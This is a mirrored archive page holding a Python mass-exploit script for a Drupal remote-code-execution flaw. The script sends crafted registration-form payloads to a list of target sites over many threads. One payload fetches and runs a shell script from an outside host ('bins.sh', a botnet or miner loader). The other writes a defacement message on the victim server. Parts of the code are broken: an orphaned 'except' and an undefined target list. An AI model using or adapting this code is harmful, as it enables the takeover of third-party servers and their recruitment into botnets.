6
0
mirror of https://github.com/threatland/TL-BOTS synced 2024-06-16 03:50:10 +00:00
TL-BOTS/TL.EXPLOIT_SCAN/EXPLOIT.Drupal/drupal2.cd12a6.py
2019-10-02 16:41:26 -04:00

57 lines
2.0 KiB
Python

#!/usr/bin/env
import sys
import requests
import os
import base64
from multiprocessing.dummy import Pool
print ('##################################################')
print ('# DRUPAL2 EXPLOIT 90K BOTS #')
print ('##################################################')
sendMiner = True
sendMessage = True
verify = False
headers = {'User-Agent': 'Mozilla 5.0 | xJesterino Was Here | Shoutout to drought!'}
evil = "wget http://b4.ck.do.or/bins.sh; chmod +x bins.sh; ./bins.sh; rm -rf bins.sh"
messagePayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "xJesterino is a god. Shout out to Drought. All your devices are belong to us. | Follow us on twitter: @xJesterino @decayable | Guess who pissed in your cheerios?" | tee ReadMeCVE.txt'}
minerPayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': ' '+evil+' '}
except IndexError:
exit('Usage: exploit.py list.txt threads')
def run(targetLine):
try:
try:
targetLine = 'http://'+targetLine+'/'
url = str(targetLine) + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
if sendMiner:
minerRequest = requests.post(url, data=minerPayload, verify=verify, headers=headers, timeout=5)
if sendMessage:
messageRequest = requests.post(url, data=messagePayload, verify=verify, headers=headers, timeout=5)
except requests.exceptions.RequestException as e:
pass
print ('[+] Attempting: '+targetLine);
except:
pass
try:
multiThreads = Pool(int(sys.argv[2]))
except IndexError:
exit('Usage: exploit.py list.txt threads')
multiThreads.map(run, target)
multiThreads.close()
multiThreads.join()
print("Finished File!")